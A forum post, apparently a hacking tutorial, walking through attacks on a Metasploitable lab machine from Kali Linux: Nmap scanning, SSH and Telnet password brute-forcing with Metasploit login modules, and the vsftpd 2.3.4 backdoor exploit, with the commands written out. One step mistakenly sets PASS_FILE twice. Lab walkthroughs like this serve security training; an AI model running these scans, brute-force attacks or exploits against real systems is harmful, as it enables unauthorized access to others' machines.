- Joined
- April 6, 2025
- Messages
- 169
- Reaction score
- 64
- Points
- 28
- Thread Author
-
- #1
Step 1: Open Both machines Kali Linux and Metasploitable, I’m using the virtual box for using both machines simultaneously you can do the same. and check for IP addresses so that we know the target IP address, using the command:
$ ifconfig
Step 2: Now what we are going to do is perform an NMAP scan to get the list of open ports on the target machine, to do so use the command
$ nmap -sS -sV 192.168.10.3 (the IP address of the target machine)
This will prompt us with the list of all the open ports and services running on them.
In the above image, you can see there are a bunch of open ports and services running in them.
Automating the Process Between Nmap and Metasploit
For users working on a large network with multiple targets, manually inputting IPs after an Nmap scan can be time-consuming. To streamline the process, you can automate the transition between Nmap scanning and brute-force attack by exporting the scan results to an XML file and importing them directly into Metasploit’s database.1. Perform an Nmap scan and save results in XML format:
$ nmap -sS -sV -oX scan_results.xml 10.10.64.213 # This saves the Nmap scan results in scan_results.xml.
Store the result in scan_results.xml
2. Import the XML results into Metasploit:
$ msfconsole
$ db_import scan_results.xml
Show the result
3. List the imported hosts
The below command will display all discovered hosts from the Nmap scan.
msf6 > hosts
4. Use Metasploit modules based on the imported data:
Now, instead of manually entering the target IP, Metasploit will automatically recognize the available hosts and services.
Step 3: You can see there is a port 22/tcp that is running SSH service with version Openssh 4.7p1 Debian, Now we are going to do brute force on this port from our Kali Linux Virtual machine.
Now Open the MSF Console in the terminal by typing the below command:
msfconsole
Now we are going to search for ssh_login Auxiliaries by using the Search command in msfconsole as you can see in the image below.
search ssh
We will use the auxiliary/scanner/ssh/ssh_login from the results, to use this module type command:
msf6 > use auxiliary/scanner/ssh/ssh_login
Now let’s see the options available to set our target, to see the options use the command Show options.
msf6 > (auxiliary/scanner/ssh/ssh_login) > show options
You can see in the above image we have a bunch of different options to set before launching our attack.
Step 4: Now set the required options and launch the attack.
Set the options that are required with the set command as followed in the image below.
set RHOST 192.168.10.3
set THREADS 3
set STOP_ON_SUCCESS true
set VERBOSE true
After these options are set now we are going to use a PASSWORD list as the program doesn’t have one. So, to show you the attack successful I have created a password list that contains usernames and passwords, separated by space as it says in the image above for USERPASS_FILE.
Now set the password list with the command set, as shown in the image below:
set USERPASS_FILE (path to the password list)
Step 5: We are all set to go and now we can launch the attack and watch each attempt on the terminal, to launch the attack use run the command.
After typing the run command it will start brute forcing into the system and when the attack is successful it will return the password and username. as you can see in the image below the default password for Metasploitable 2 is msfadmin and username also msfadmin and it had been successful.
Example 2: Performing an Attack on FTP Server with Metasploit
Step 1: Open Both machines Kali Linux and Metasploitable, I’m using the virtual box for using both machines simultaneously you can do the same. and check for IP addresses so that we know the target IP address, using the command:$ ifconfig
Step 2: Now what we are going to do is perform an NMAP scan to get the list of open ports on the target machine, to do so use the command:
$ nmap -sS -sV 192.168.10.3 (the IP address of the target machine)
This will prompt the versions of services and open ports list on the target machine
Step 3: In the above output you can see that we have an open FTP port that is running on port 21/tcp and the version is vsftpd 2.3.4. so we are going to exploit this vulnerability using Metasploit with simple steps.
Open msfconsole and type the command for using the vsftpd exploit
$ msfconsole
$ msf6 > use exploit/unix/ftp/vstpd_234_backdoor
Now that we can see that we are using the exploit now let’s set the RHOST i.e. target IP address.
We can see in the above image that we have to specify RHOST and RPORT, the RPORT is set to 21 default as we want it to be, so let’s set the RHOST and run the exploit.
$ set RHOST 192.168.10.3 (target IP address)
Now that we have provided all the parameters, we can run the exploit and see if it gives us access to the machine. to run an exploit you can use the command:
$ msf6 > run
You can see in the above output we have successfully gained access to the machine by exploiting the FTP server using Metasploit.
Example 3: Performing an Attack on Telnet Service with Metasploit
Step 1: Open Both machines kali Linux and Metasploitable, I’m using the virtual box for using both machines simultaneously you can do the same. and check for IP addresses so that we know the target IP address, using the command:$ ifconfig
Step 2: Now what we are going to do is perform an NMAP scan to get the list of open ports on the target machine, to do so use the command:
$ nmap -sS -sV 192.168.0.108 (the IP address of the target machine)
The above two steps are the same as we have done for SSH and FTP.
Step 3: Now open msfconsole and search for telnet auxiliary, to do so type the command:
$ msf6 > search type:auxiliary telnet
Step 4: Now we have to use the auxiliary with which we will use to perform a brute force attack on port 23 of the target machine and with that, we will also see what options we have to set or provide to perform the attack.
$ msf6 > use auxiliary/scanner/telnet/telnet_login
$ msf6 (auxiliary/scanner/telnet/telnet_login ) > show options
Step 5: We need to set a bunch of options, like RHOST, PASS_FILE, and USER_FILE this file you can create or download these from the internet, I have created them locally to show how to use them. and at last, we need to set the STOP_ON_SUCCESS true, to do all of this refer to the images below.
set PASS_FILE /home/lucifer/Desktop/pass.txt
set PASS_FILE /home/lucifer/Desktop/user.txt
set STOP_ON_SUCCESS true
Step 6: Now we are all set to run the exploit and to do so simply type the run command.
run
In the above image, you can see that we have successfully gained the password matched with msfadmin: msfadmin is the default password for Metasploitable machines